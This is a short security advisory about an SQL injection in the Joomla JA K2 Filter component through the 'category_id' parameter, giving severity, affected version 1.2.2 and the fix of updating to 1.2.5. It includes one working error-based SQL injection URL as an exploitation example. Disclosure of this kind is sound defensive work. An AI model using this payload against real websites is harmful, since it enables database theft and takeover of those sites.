SQL injection in Joomla! JA K2 Filter Component - #VU3420
Published: January 4, 2017
Vulnerability identifier: #VU3420
CSH Severity: Medium
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/U:Green
CVE-ID: N/A
CWE-ID: CWE-89
Exploitation vector: Remote access
Exploit availability:
No public exploit available
Vendor: JoomlArt.com
Affected software:
Joomla! JA K2 Filter Component
Joomla! JA K2 Filter Component
Detailed vulnerability description
The vulnerability allows a remote attacker to execute arbitrary SQL commands in vulnerable application.
The vulnerability exists due to insufficient sanitization of user-supplied data passed via "category_id" HTTP GET parameter to /index.php in ja-k2-filter-and-search component. A remote attacker can send a specially crafted HTTP request to vulnerable script and execute arbitrary SQL commands in web application database.
Successful exploitation may allow an attacker to gain complete control over vulnerable website.Exploitation example:
http://[host]/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27The vulnerability was reported in version 1.2.2. Prior versions may also be affected.
Remediation
Update to version 1.2.5.